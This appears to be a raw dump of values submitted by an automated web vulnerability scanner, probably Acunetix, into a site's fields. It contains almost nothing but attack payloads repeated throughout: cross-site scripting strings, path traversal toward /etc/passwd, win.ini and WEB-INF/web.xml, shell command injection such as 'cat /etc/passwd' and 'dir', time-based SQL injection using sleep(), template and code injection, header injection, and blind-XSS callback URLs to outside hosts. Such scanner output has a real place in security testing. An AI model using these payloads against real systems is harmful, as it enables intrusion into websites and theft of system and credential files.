1<ScRiPt >prompt(904730)</ScRiPt>

1

1

1

1<ScRiPt/acu src=//testasp.vulnweb.com/t/xss.js?950176></ScRiPt>

..\..\..\..\..\..\..\..\windows\win.ini

1

1

1

1<ScRiPt >prompt(950713)</ScRiPt>

/.\./.\./.\./.\./.\./.\./windows/win.ini

../..//../..//../..//../..//../..//../..//../..//../..//windows/win.ini

1

1<video><source onerror="javascript:prompt(919005)">

1

1

../.../.././../.../.././../.../.././../.../.././../.../.././../.../.././windows/win.ini

1<svg xmlns="http://www.w3.org/2000/svg"><g onload="javascript:prompt(998633)"></g></svg>

1

1

1

1<div style=width:expression(prompt(971510))>

1

WEB-INF/web.xml

response.write(9506713*9872681)

1

1

1<iframe src='data:text/html

1

WEB-INF\web.xml

&cat /etc/passwd&

'+response.write(9506713*9872681)+'

SomeCustomInjectedHeader:injected_by_wvs

1<body onload=prompt(937657)>

1

1

../../../../../../../../../../etc/passwd

'&cat /etc/passwd&'

1

1

"+response.write(9506713*9872681)+"

SomeCustomInjectedHeader:injected_by_wvs

1

1<img src=//testasp.vulnweb.com/t/dot.gif onload=prompt(979824)>

1

..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00.jpg

SomeCustomInjectedHeader:injected_by_wvs

1

if(now()=sysdate(),sleep(6.874),0)/*'XOR(if(now()=sysdate(),sleep(6.874),0))OR'"XOR(if(now()=sysdate(),sleep(6.874),0))OR"*/

1

1<img src=xyz OnErRor=prompt(948432)>

1

"&cat /etc/passwd&"

../../../../../../../../../../etc/passwd.jpg

1

1

1<img/src=">" onerror=alert(923337)>

(select(0)from(select(sleep(6.874)))v)/*'+(select(0)from(select(sleep(6.874)))v)+'"+(select(0)from(select(sleep(6.874)))v)+"*/

1

${100065+99361}

1

cat /etc/passwd

1

Li4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vZXRjL3Bhc3N3ZAAucG5n

1

1<ScRiPt%20>prompt(998195)</sCripT>

-1

1

1

1

1

1

`cat /etc/passwd`

..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00.jpg

1&n989471=v920502

1&lt

-1)

http://some-inexistent-website.acu/some_inexistent_file_with_long_name?%00.jpg

1

)

1

|cat /etc/passwd#

/../..//../..//../..//../..//../..//etc/passwd.jpg

<img acu onmouseover=prompt(988039) //>

1

1some_inexistent_file_with_long_name%00.jpg

-1))

1

!(()&&!|*|*|

1

'"()

http://testasp.vulnweb.com/t/fit.txt?%00.jpg

1<input autofocus onfocus=prompt(962802)>

.\./.\./.\./.\./.\./.\./etc/passwd

'|'ld

AGcnAWRf'

1

^(#$!@#$)(()))******

1

1

testasp.vulnweb.com

<a href='http://www.acunetix.com'>website security</a>

"|"ld

/etc/passwd

'

obf9zj9z')

1

1

[url=http://www.acunetix.com]website security[/url]

1

1

1

../..//../..//../..//../..//../..//../..//../..//../..//etc/passwd

wKnjd52k'))

"

1

1

1_VkeOb <ScRiPt >prompt(944290)</ScRiPt>

http://testasp.vulnweb.com/t/xss.html?%00.jpg

../.../.././../.../.././../.../.././../.../.././../.../.././../.../.././etc/passwd

1

'

1

-1

${@print(md5(acunetix_wvs_security_test))}

1

1

1

1

................etc/passwd

1

"

1

${@print(md5(acunetix_wvs_security_test))}\

-1)

http://hitZ2OqG7dT9d.bxss.me/

acunetix_wvs_invalid_filename

1

1

1

||cat /etc/passwd

-1))

1

1

comments

1

1

file:///etc/passwd

)))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))

1

&dir

qxwyZ0xi'

1

http://www.acunetix.tst

comments

'"

1'"()&%<ScRiPt >prompt(977417)</ScRiPt>

/\../\../\../\../\../\../\../etc/passwd

1

1

1

'&dir&'

comments/.

OvLKFuM8')

1

<!--

'"()&%<ScRiPt >prompt(936705)</ScRiPt>

WEB-INF/web.xml

1

1

"&dir&"

1

fUYhcIZ3'))

1

WEB-INF\web.xml

1_969970

1

1

1

|dir

1

../../../../../../../../../../windows/win.ini

1

1

acu1981<s1﹥s2ʺs3ʹuca1981

1

1

'|dir

../../../../../../../../../../boot.ini

1

acux5210z1z2abcxuca5210

1

"|dir

1

../../../../../../../../../../windows/win.ini.jpg

1

1<ScRiPt >prompt(910071)</ScRiPt>

1

1

1

windowswin.ini

1

1

1<script>prompt(988870)</script>

1

1

................windowswin.ini

1<ScRiPt >prompt(936597)</ScRiPt>

1

1

1

1

..\..\..\..\..\..\..\..\windows\win.ini

1<ScRiPt/acu src=//testasp.vulnweb.com/t/xss.js?981950></ScRiPt>

1

1

1

1<ScRiPt >prompt(946063)</ScRiPt>

/.\./.\./.\./.\./.\./.\./windows/win.ini

1

1

1

1<video><source onerror="javascript:prompt(996175)">

1

1

../..//../..//../..//../..//../..//../..//../..//../..//windows/win.ini

1

1

1<svg xmlns="http://www.w3.org/2000/svg"><g onload="javascript:prompt(974919)"></g></svg>

../.../.././../.../.././../.../.././../.../.././../.../.././../.../.././windows/win.ini

1

1

1

1

1<div style=width:expression(prompt(953435))>

1

1

1

1

WEB-INF/web.xml

response.write(9581969*9259747)

1<iframe src='data:text/html

'+response.write(9581969*9259747)+'

&cat /etc/passwd&

WEB-INF\web.xml

1

1<body onload=prompt(932957)>

SomeCustomInjectedHeader:injected_by_wvs

1

1

../../../../../../../../../../etc/passwd

"+response.write(9581969*9259747)+"

'&cat /etc/passwd&'

1<img src=//testasp.vulnweb.com/t/dot.gif onload=prompt(935931)>

1

SomeCustomInjectedHeader:injected_by_wvs

if(now()=sysdate(),sleep(3),0)/*'XOR(if(now()=sysdate(),sleep(3),0))OR'"XOR(if(now()=sysdate(),sleep(3),0))OR"*/

1

1

..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00.jpg

1

1

"&cat /etc/passwd&"

1<img src=xyz OnErRor=prompt(919462)>

SomeCustomInjectedHeader:injected_by_wvs

(select(0)from(select(sleep(3)))v)/*'+(select(0)from(select(sleep(3)))v)+'"+(select(0)from(select(sleep(3)))v)+"*/

1

1

1

1

cat /etc/passwd

../../../../../../../../../../etc/passwd.jpg

1<img/src=">" onerror=alert(932896)>

-1

1

${99553+99584}

1

1

1

`cat /etc/passwd`

Li4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vZXRjL3Bhc3N3ZAAucG5n

1<ScRiPt%20>prompt(910786)</sCripT>

-1)

1

1

http://some-inexistent-website.acu/some_inexistent_file_with_long_name?%00.jpg

1

1

|cat /etc/passwd#

..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00.jpg

1&lt

1&n910025=v977659

-1))

1some_inexistent_file_with_long_name%00.jpg

1

'|'ld

1

1

<img acu onmouseover=prompt(940668) //>

)

/../..//../..//../..//../..//../..//etc/passwd.jpg

1

A8B5ary4'

http://testasp.vulnweb.com/t/fit.txt?%00.jpg

1

1

"|"ld

1<input autofocus onfocus=prompt(935070)>

!(()&&!|*|*|

.\./.\./.\./.\./.\./.\./etc/passwd

MMPdRdAw')

testasp.vulnweb.com

http://testasp.vulnweb.com/t/xss.html?%00.jpg

1

'"()

<a href='http://www.acunetix.com'>website security</a>

^(#$!@#$)(()))******

'

/etc/passwd

1

3Ijhu8Us'))

1

1

'

1

[url=http://www.acunetix.com]website security[/url]

1

"

-1

1

../..//../..//../..//../..//../..//../..//../..//../..//etc/passwd

1

1

"

1

1

1_Rl3hN <ScRiPt >prompt(943370)</ScRiPt>

${@print(md5(acunetix_wvs_security_test))}

-1)

acunetix_wvs_invalid_filename

1

../.../.././../.../.././../.../.././../.../.././../.../.././../.../.././etc/passwd

1

||cat /etc/passwd

http://hitpTFODN36yu.bxss.me/

1

1

${@print(md5(acunetix_wvs_security_test))}\

-1))

comments

1

................etc/passwd

1

&dir

1

1

1

comments

vAq462nc'

)))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))

1

1

comments/.

1

1

'&dir&'

CCOtOm0F')

http://www.acunetix.tst

1

1

'"

file:///etc/passwd

1

1

1'"()&%<ScRiPt >prompt(965014)</ScRiPt>

"&dir&"

PIpEhZJn'))

1

1

<!--

1

/\../\../\../\../\../\../\../etc/passwd

1

|dir

1

'"()&%<ScRiPt >prompt(966649)</ScRiPt>

1

1

1

1_931177

WEB-INF/web.xml

1

'|dir

1

1

1

WEB-INF\web.xml

1

"|dir

1

../../../../../../../../../../windows/win.ini

acu2252<s1﹥s2ʺs3ʹuca2252

1

1

1

../../../../../../../../../../boot.ini

1

acux7441z1z2abcxuca7441

1

1

../../../../../../../../../../windows/win.ini.jpg

1

1<ScRiPt >prompt(995407)</ScRiPt>

1

1

1<script>prompt(958666)</script>

1

windowswin.ini

1

1

1

1<ScRiPt >prompt(909568)</ScRiPt>

................windowswin.ini

1

1

1

1<ScRiPt/acu src=//testasp.vulnweb.com/t/xss.js?948773></ScRiPt>

1

1

1

..\..\..\..\..\..\..\..\windows\win.ini

1<ScRiPt >prompt(976350)</ScRiPt>

1

1

/.\./.\./.\./.\./.\./.\./windows/win.ini

1

1<video><source onerror="javascript:prompt(948354)">

1

../..//../..//../..//../..//../..//../..//../..//../..//windows/win.ini

1<svg xmlns="http://www.w3.org/2000/svg"><g onload="javascript:prompt(998351)"></g></svg>

1

response.write(9479384*9616041)

1

1<div style=width:expression(prompt(930112))>

../.../.././../.../.././../.../.././../.../.././../.../.././../.../.././windows/win.ini

1

1

'+response.write(9479384*9616041)+'

1<iframe src='data:text/html

&cat /etc/passwd&

1

"+response.write(9479384*9616041)+"

1

1

'&cat /etc/passwd&'

SomeCustomInjectedHeader:injected_by_wvs

1<body onload=prompt(990093)>

../../../../../../../../../../etc/passwd

1

WEB-INF/web.xml

if(now()=sysdate(),sleep(9),0)/*'XOR(if(now()=sysdate(),sleep(9),0))OR'"XOR(if(now()=sysdate(),sleep(9),0))OR"*/

1

1

"&cat /etc/passwd&"

SomeCustomInjectedHeader:injected_by_wvs

WEB-INF\web.xml

1<img src=//testasp.vulnweb.com/t/dot.gif onload=prompt(973242)>

1

..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00.jpg

cat /etc/passwd

(select(0)from(select(sleep(9)))v)/*'+(select(0)from(select(sleep(9)))v)+'"+(select(0)from(select(sleep(9)))v)+"*/

1

1

SomeCustomInjectedHeader:injected_by_wvs

../../../../../../../../../../etc/passwd.jpg

1<img src=xyz OnErRor=prompt(976601)>

1

1

`cat /etc/passwd`

-1

1

1

1

1

1<img/src=">" onerror=alert(916059)>

Li4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vZXRjL3Bhc3N3ZAAucG5n

${99102+100412}

|cat /etc/passwd#

-1)

1

1

1

..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00.jpg

1<ScRiPt%20>prompt(906277)</sCripT>

1

1

1&n999419=v969543

-1))

'|'ld

http://some-inexistent-website.acu/some_inexistent_file_with_long_name?%00.jpg

1

1

1&lt

/../..//../..//../..//../..//../..//etc/passwd.jpg

)

1

1

sRb9UZzj'

1

"|"ld

1some_inexistent_file_with_long_name%00.jpg

.\./.\./.\./.\./.\./.\./etc/passwd

<img acu onmouseover=prompt(984721) //>

1

!(()&&!|*|*|

icBRerjL')

http://testasp.vulnweb.com/t/fit.txt?%00.jpg

1

'"()

1<input autofocus onfocus=prompt(967319)>

/etc/passwd

1

^(#$!@#$)(()))******

'

oJiHJCKX'))

1

testasp.vulnweb.com

'

<a href='http://www.acunetix.com'>website security</a>

1

1

../..//../..//../..//../..//../..//../..//../..//../..//etc/passwd

"

1

-1

http://testasp.vulnweb.com/t/xss.html?%00.jpg

1

[url=http://www.acunetix.com]website security[/url]

"

1

1

../.../.././../.../.././../.../.././../.../.././../.../.././../.../.././etc/passwd

1

-1)

${@print(md5(acunetix_wvs_security_test))}

1

1

1

1_e8tEY <ScRiPt >prompt(924602)</ScRiPt>

||cat /etc/passwd

................etc/passwd

1

1

${@print(md5(acunetix_wvs_security_test))}\

-1))

acunetix_wvs_invalid_filename

http://hitzskVJTuke0.bxss.me/

1

&dir

1

1

1

XyDxm3Jp'

comments

1

1

1

'&dir&'

1

file:///etc/passwd

1

"&dir&"

comments

1

)))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))

pUG06j8N')

1

http://www.acunetix.tst

1

'"

/\../\../\../\../\../\../\../etc/passwd

KExQAiFP'))

comments/.

|dir

1'"()&%<ScRiPt >prompt(974216)</ScRiPt>

1

1

1

WEB-INF/web.xml

<!--

1

1

1

'|dir

'"()&%<ScRiPt >prompt(944073)</ScRiPt>

WEB-INF\web.xml

1

1

1

1

1_911470

"|dir

1

1

../../../../../../../../../../windows/win.ini

1

1

1

acu5284<s1﹥s2ʺs3ʹuca5284

1

../../../../../../../../../../boot.ini

1

1

1

../../../../../../../../../../windows/win.ini.jpg

acux9551z1z2abcxuca9551

1

1

1

windowswin.ini

1<ScRiPt >prompt(942121)</ScRiPt>

1

1

1

1

1<script>prompt(953105)</script>

................windowswin.ini

1

1

1

1<ScRiPt >prompt(991041)</ScRiPt>

..\..\..\..\..\..\..\..\windows\win.ini

1

1

1<ScRiPt/acu src=//testasp.vulnweb.com/t/xss.js?929326></ScRiPt>

1

1

1

1<ScRiPt >prompt(992669)</ScRiPt>

/.\./.\./.\./.\./.\./.\./windows/win.ini

1

1

1

1<video><source onerror="javascript:prompt(959055)">

../..//../..//../..//../..//../..//../..//../..//../..//windows/win.ini

1

1

1

1<svg xmlns="http://www.w3.org/2000/svg"><g onload="javascript:prompt(936716)"></g></svg>

../.../.././../.../.././../.../.././../.../.././../.../.././../.../.././windows/win.ini

1

1

1<div style=width:expression(prompt(990732))>

1

response.write(9453164*9896926)

1

1

WEB-INF/web.xml

&cat /etc/passwd&

1

1

1<iframe src='data:text/html

'+response.write(9453164*9896926)+'

WEB-INF\web.xml

'&cat /etc/passwd&'

1<body onload=prompt(996913)>

1

1

1

SomeCustomInjectedHeader:injected_by_wvs

"+response.write(9453164*9896926)+"

../../../../../../../../../../etc/passwd

1

"&cat /etc/passwd&"

1<img src=//testasp.vulnweb.com/t/dot.gif onload=prompt(929202)>

1

SomeCustomInjectedHeader:injected_by_wvs

1

1

1

..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00.jpg

if(now()=sysdate(),sleep(6),0)/*'XOR(if(now()=sysdate(),sleep(6),0))OR'"XOR(if(now()=sysdate(),sleep(6),0))OR"*/

SomeCustomInjectedHeader:injected_by_wvs

1<img src=xyz OnErRor=prompt(940749)>

cat /etc/passwd

1

1

1

(select(0)from(select(sleep(6)))v)/*'+(select(0)from(select(sleep(6)))v)+'"+(select(0)from(select(sleep(6)))v)+"*/

1

../../../../../../../../../../etc/passwd.jpg

1

1<img/src=">" onerror=alert(996954)>

1

`cat /etc/passwd`

1

1

-1

Li4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vZXRjL3Bhc3N3ZAAucG5n

1

1

1<ScRiPt%20>prompt(989485)</sCripT>

1

|cat /etc/passwd#

1

${99019+100396}

'|'ld

-1)

..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00.jpg

1

1

1&lt

1

1

"|"ld

1

1

-1))

http://some-inexistent-website.acu/some_inexistent_file_with_long_name?%00.jpg

/../..//../..//../..//../..//../..//etc/passwd.jpg

1

1&n929037=v952644

<img acu onmouseover=prompt(973550) //>

)

CVyoO3jz'

1some_inexistent_file_with_long_name%00.jpg

.\./.\./.\./.\./.\./.\./etc/passwd

1

1

1<input autofocus onfocus=prompt(918759)>

!(()&&!|*|*|

'"()

http://testasp.vulnweb.com/t/fit.txt?%00.jpg

'

'

dHtpV5kD')

/etc/passwd

1

http://testasp.vulnweb.com/t/xss.html?%00.jpg

^(#$!@#$)(()))******

<a href='http://www.acunetix.com'>website security</a>

1

testasp.vulnweb.com

JlBXW6De'))

"

"

../..//../..//../..//../..//../..//../..//../..//../..//etc/passwd

1

1

1

[url=http://www.acunetix.com]website security[/url]

1

1

../.../.././../.../.././../.../.././../.../.././../.../.././../.../.././etc/passwd

||cat /etc/passwd

${@print(md5(acunetix_wvs_security_test))}

-1

1

1

1

1

http://hitRlTFqfBpuu.bxss.me/

1_2mq6E <ScRiPt >prompt(908066)</ScRiPt>

................etc/passwd

&dir

${@print(md5(acunetix_wvs_security_test))}\

-1)

acunetix_wvs_invalid_filename

1

1

1

1

1

1

'&dir&'

-1))

comments

1

1

)))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))

1

1

1

"&dir&"

file:///etc/passwd

Z0vzzOsi'

comments

1

1

1

1

http://www.acunetix.tst

|dir

1

'"

comments/.

1'"()&%<ScRiPt >prompt(978263)</ScRiPt>

xuHVPEiF')

/\../\../\../\../\../\../\../etc/passwd

1

1

1

'|dir

BhysWsUh'))

1

WEB-INF/web.xml

'"()&%<ScRiPt >prompt(988102)</ScRiPt>

<!--

1

1

"|dir

1

1

1_966420

WEB-INF\web.xml

1

1

1

1

../../../../../../../../../../windows/win.ini

1

1

1

1

../../../../../../../../../../boot.ini

acu8279<s1﹥s2ʺs3ʹuca8279

1

acux4290z1z2abcxuca4290

1

../../../../../../../../../../windows/win.ini.jpg

1

1

1<ScRiPt >prompt(904581)</ScRiPt>

1

1

1

windowswin.ini

1<script>prompt(930255)</script>

1

1

1<ScRiPt >prompt(930367)</ScRiPt>

................windowswin.ini

1

1

1

1<ScRiPt/acu src=//testasp.vulnweb.com/t/xss.js?984228></ScRiPt>

1

..\..\..\..\..\..\..\..\windows\win.ini

1

1

1<ScRiPt >prompt(984018)</ScRiPt>

/.\./.\./.\./.\./.\./.\./windows/win.ini

1

1<video><source onerror="javascript:prompt(976230)">

1

1

1

../..//../..//../..//../..//../..//../..//../..//../..//windows/win.ini

1<svg xmlns="http://www.w3.org/2000/svg"><g onload="javascript:prompt(950002)"></g></svg>

1

1

1

../.../.././../.../.././../.../.././../.../.././../.../.././../.../.././windows/win.ini

1<div style=width:expression(prompt(954777))>

1

1

1

1<iframe src='data:text/html

1

response.write(9337187*9058188)

1

1

1<body onload=prompt(974422)>

WEB-INF/web.xml

1

'+response.write(9337187*9058188)+'

1

&cat /etc/passwd&

1

1<img src=//testasp.vulnweb.com/t/dot.gif onload=prompt(917306)>

WEB-INF\web.xml

SomeCustomInjectedHeader:injected_by_wvs

"+response.write(9337187*9058188)+"

1

if(now()=sysdate(),sleep(3),0)/*'XOR(if(now()=sysdate(),sleep(3),0))OR'"XOR(if(now()=sysdate(),sleep(3),0))OR"*/

'&cat /etc/passwd&'

../../../../../../../../../../etc/passwd

1<img src=xyz OnErRor=prompt(927641)>

1

SomeCustomInjectedHeader:injected_by_wvs

1

1

1

"&cat /etc/passwd&"

(select(0)from(select(sleep(3)))v)/*'+(select(0)from(select(sleep(3)))v)+'"+(select(0)from(select(sleep(3)))v)+"*/

1<img/src=">" onerror=alert(946002)>

..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00.jpg

1

SomeCustomInjectedHeader:injected_by_wvs

1

1

cat /etc/passwd

1<ScRiPt%20>prompt(926456)</sCripT>

1

-1

${99854+99617}

1

../../../../../../../../../../etc/passwd.jpg

1

1

1

`cat /etc/passwd`

1&lt

-1)

1

1

Li4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vZXRjL3Bhc3N3ZAAucG5n

http://some-inexistent-website.acu/some_inexistent_file_with_long_name?%00.jpg

1

|cat /etc/passwd#

1

1&n924200=v938561

<img acu onmouseover=prompt(983922) //>

)

-1))

1

1some_inexistent_file_with_long_name%00.jpg

..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00.jpg

1

1<input autofocus onfocus=prompt(900070)>

'|'ld

1

1

!(()&&!|*|*|

Zi8KXGbr'

1

http://testasp.vulnweb.com/t/fit.txt?%00.jpg

/../..//../..//../..//../..//../..//etc/passwd.jpg

<a href='http://www.acunetix.com'>website security</a>

1

"|"ld

oruARZkY')

^(#$!@#$)(()))******

.\./.\./.\./.\./.\./.\./etc/passwd

[url=http://www.acunetix.com]website security[/url]

testasp.vulnweb.com

1

'"()

1

bYyh40x5'))

'

/etc/passwd

1_pLOM9 <ScRiPt >prompt(995980)</ScRiPt>

1

http://testasp.vulnweb.com/t/xss.html?%00.jpg

1

1

-1

1

1

"

'

../..//../..//../..//../..//../..//../..//../..//../..//etc/passwd

1

1

1

-1)

1

1

1

${@print(md5(acunetix_wvs_security_test))}

"

../.../.././../.../.././../.../.././../.../.././../.../.././../.../.././etc/passwd

1

1

1

-1))

1

1

http://hit8BFmHBVXgO.bxss.me/

||cat /etc/passwd

${@print(md5(acunetix_wvs_security_test))}\

................etc/passwd

1

2nNQ4BIo'

acunetix_wvs_invalid_filename

1

1

)))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))

1

&dir

comments

http://www.acunetix.tst

xKAi8uaZ')

1

1

1

1

file:///etc/passwd

'&dir&'

1

'"

comments

1

eqkRUn9o'))

1

/\../\../\../\../\../\../\../etc/passwd

1'"()&%<ScRiPt >prompt(975779)</ScRiPt>

<!--

1

"&dir&"

comments/.

1

1

1

WEB-INF/web.xml

'"()&%<ScRiPt >prompt(966066)</ScRiPt>

|dir

1

1

1

1

1

WEB-INF\web.xml

'|dir

1

1_997147

1

1

1

../../../../../../../../../../windows/win.ini

"|dir

1

1

acu7594<s1﹥s2ʺs3ʹuca7594

1

../../../../../../../../../../boot.ini

1

1

1

acux3497z1z2abcxuca3497

1

1<ScRiPt >prompt(941456)</ScRiPt>

1

1

1

../../../../../../../../../../windows/win.ini.jpg

1<script>prompt(962000)</script>

1

1

1

windowswin.ini

1<ScRiPt >prompt(927900)</ScRiPt>

1

1

1

1<ScRiPt/acu src=//testasp.vulnweb.com/t/xss.js?964224></ScRiPt>

1

1

................windowswin.ini

1

1<ScRiPt >prompt(916248)</ScRiPt>

1

..\..\..\..\..\..\..\..\windows\win.ini

1

1

1

1<video><source onerror="javascript:prompt(963331)">

1

/.\./.\./.\./.\./.\./.\./windows/win.ini

1

1

1<svg xmlns="http://www.w3.org/2000/svg"><g onload="javascript:prompt(964734)"></g></svg>

../..//../..//../..//../..//../..//../..//../..//../..//windows/win.ini

1<div style=width:expression(prompt(978282))>

1

response.write(9650543*9929277)

1

1

1<iframe src='data:text/html

../.../.././../.../.././../.../.././../.../.././../.../.././../.../.././windows/win.ini

&cat /etc/passwd&

'+response.write(9650543*9929277)+'

1

1

1<body onload=prompt(916554)>

'&cat /etc/passwd&'

1

"+response.write(9650543*9929277)+"

1

1<img src=//testasp.vulnweb.com/t/dot.gif onload=prompt(980767)>

WEB-INF/web.xml

"&cat /etc/passwd&"

SomeCustomInjectedHeader:injected_by_wvs

if(now()=sysdate(),sleep(9),0)/*'XOR(if(now()=sysdate(),sleep(9),0))OR'"XOR(if(now()=sysdate(),sleep(9),0))OR"*/

1

1

../../../../../../../../../../etc/passwd

1<img src=xyz OnErRor=prompt(975315)>

SomeCustomInjectedHeader:injected_by_wvs

WEB-INF\web.xml

1

cat /etc/passwd

1

(select(0)from(select(sleep(9)))v)/*'+(select(0)from(select(sleep(9)))v)+'"+(select(0)from(select(sleep(9)))v)+"*/

1<img/src=">" onerror=alert(900892)>

1

..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00.jpg

`cat /etc/passwd`

SomeCustomInjectedHeader:injected_by_wvs

1

1

1

-1

1<ScRiPt%20>prompt(963650)</sCripT>

1

../../../../../../../../../../etc/passwd.jpg

|cat /etc/passwd#

1

1

1

-1)

1

1&lt

${99119+100141}

'|'ld

1

Li4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vZXRjL3Bhc3N3ZAAucG5n

-1))

1

1

http://some-inexistent-website.acu/some_inexistent_file_with_long_name?%00.jpg

1

<img acu onmouseover=prompt(916047) //>

1

"|"ld

1&n911815=v925507

..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00.jpg

1

rOiRCbGy'

1some_inexistent_file_with_long_name%00.jpg

1

1<input autofocus onfocus=prompt(943338)>

)

1

1

QzdCYu8G')

/../..//../..//../..//../..//../..//etc/passwd.jpg

1

http://testasp.vulnweb.com/t/fit.txt?%00.jpg

<a href='http://www.acunetix.com'>website security</a>

!(()&&!|*|*|

1

'

GWlumaXs'))

'

testasp.vulnweb.com

.\./.\./.\./.\./.\./.\./etc/passwd

'"()

[url=http://www.acunetix.com]website security[/url]

^(#$!@#$)(()))******

1

1

"

-1

1

"

/etc/passwd

1

1_PJkHD <ScRiPt >prompt(949553)</ScRiPt>

1

http://testasp.vulnweb.com/t/xss.html?%00.jpg

1

-1)

||cat /etc/passwd

1

${@print(md5(acunetix_wvs_security_test))}

../..//../..//../..//../..//../..//../..//../..//../..//etc/passwd

1

1

1

1

-1))

&dir

1

1

1

${@print(md5(acunetix_wvs_security_test))}\

1

1

../.../.././../.../.././../.../.././../.../.././../.../.././../.../.././etc/passwd

http://hitaebiJn55Ha.bxss.me/

EA50csls'

1

'&dir&'

1

1

acunetix_wvs_invalid_filename

1

1

................etc/passwd

IJk39s1p')

1

1

"&dir&"

http://www.acunetix.tst

comments

1

)))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))

1

1

zchenl9w'))

'"

|dir

comments

1

1

1'"()&%<ScRiPt >prompt(992706)</ScRiPt>

1

file:///etc/passwd

1

1

'|dir

<!--

comments/.

1

1

'"()&%<ScRiPt >prompt(906832)</ScRiPt>

/\../\../\../\../\../\../\../etc/passwd

1

"|dir

1

1

1

1_922673

1

WEB-INF/web.xml

1

1

1

1

WEB-INF\web.xml

1

acu2493<s1﹥s2ʺs3ʹuca2493

1

1

1

../../../../../../../../../../windows/win.ini

1

1

1

acux1228z1z2abcxuca1228

1

1<ScRiPt >prompt(921418)</ScRiPt>

1

../../../../../../../../../../boot.ini

1

1

1<script>prompt(967140)</script>

1

1

1

../../../../../../../../../../windows/win.ini.jpg

1<ScRiPt >prompt(969506)</ScRiPt>

1

1

1

windowswin.ini

1

1<ScRiPt/acu src=//testasp.vulnweb.com/t/xss.js?969526></ScRiPt>

1

................windowswin.ini

1

1

1<ScRiPt >prompt(995963)</ScRiPt>

1

..\..\..\..\..\..\..\..\windows\win.ini

1

1

1<video><source onerror="javascript:prompt(980463)">

1

/.\./.\./.\./.\./.\./.\./windows/win.ini

1

1<svg xmlns="http://www.w3.org/2000/svg"><g onload="javascript:prompt(943907)"></g></svg>

1

1

1<div style=width:expression(prompt(971941))>

response.write(9839004*9267614)

../..//../..//../..//../..//../..//../..//../..//../..//windows/win.ini

1

1

1<iframe src='data:text/html

'+response.write(9839004*9267614)+'

1

1

../.../.././../.../.././../.../.././../.../.././../.../.././../.../.././windows/win.ini

1

&cat /etc/passwd&

"+response.write(9839004*9267614)+"

1<body onload=prompt(967939)>

1

SomeCustomInjectedHeader:injected_by_wvs

1

'&cat /etc/passwd&'

1

SomeCustomInjectedHeader:injected_by_wvs

1<img src=//testasp.vulnweb.com/t/dot.gif onload=prompt(914206)>

../../../../../../../../../../etc/passwd

1

if(now()=sysdate(),sleep(6),0)/*'XOR(if(now()=sysdate(),sleep(6),0))OR'"XOR(if(now()=sysdate(),sleep(6),0))OR"*/

WEB-INF/web.xml

1

"&cat /etc/passwd&"

1

1

..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00.jpg

1<img src=xyz OnErRor=prompt(976598)>

SomeCustomInjectedHeader:injected_by_wvs

(select(0)from(select(sleep(6)))v)/*'+(select(0)from(select(sleep(6)))v)+'"+(select(0)from(select(sleep(6)))v)+"*/

WEB-INF\web.xml

1

cat /etc/passwd

1

../../../../../../../../../../etc/passwd.jpg

1

1<img/src=">" onerror=alert(903372)>

-1

1

1

${99292+100396}

`cat /etc/passwd`

1

-1)

http://some-inexistent-website.acu/some_inexistent_file_with_long_name?%00.jpg

1<ScRiPt%20>prompt(928667)</sCripT>

Li4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vZXRjL3Bhc3N3ZAAucG5n

1

1

1&n983238=v947727

1

|cat /etc/passwd#

1

-1))

1some_inexistent_file_with_long_name%00.jpg

1&lt

..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00.jpg

1

1

)

1

'|'ld

OvpBB7c2'

http://testasp.vulnweb.com/t/fit.txt?%00.jpg

1

<img acu onmouseover=prompt(973218) //>

/../..//../..//../..//../..//../..//etc/passwd.jpg

1

!(()&&!|*|*|

"|"ld

txXgYsJm')

testasp.vulnweb.com

1

1<input autofocus onfocus=prompt(948983)>

.\./.\./.\./.\./.\./.\./etc/passwd

'"()

'

^(#$!@#$)(()))******

1

1

XOo8BJv9'))

<a href='http://www.acunetix.com'>website security</a>

http://testasp.vulnweb.com/t/xss.html?%00.jpg

/etc/passwd

1

"

-1

1

1

1

'

[url=http://www.acunetix.com]website security[/url]

1

../..//../..//../..//../..//../..//../..//../..//../..//etc/passwd

1

"

${@print(md5(acunetix_wvs_security_test))}

-1)

1

1

1

1_3Qw6O <ScRiPt >prompt(996894)</ScRiPt>

1

http://hitjZW4JnKrif.bxss.me/

../.../.././../.../.././../.../.././../.../.././../.../.././../.../.././etc/passwd

1

||cat /etc/passwd

${@print(md5(acunetix_wvs_security_test))}\

-1))

1

1

1

acunetix_wvs_invalid_filename

1

1

1

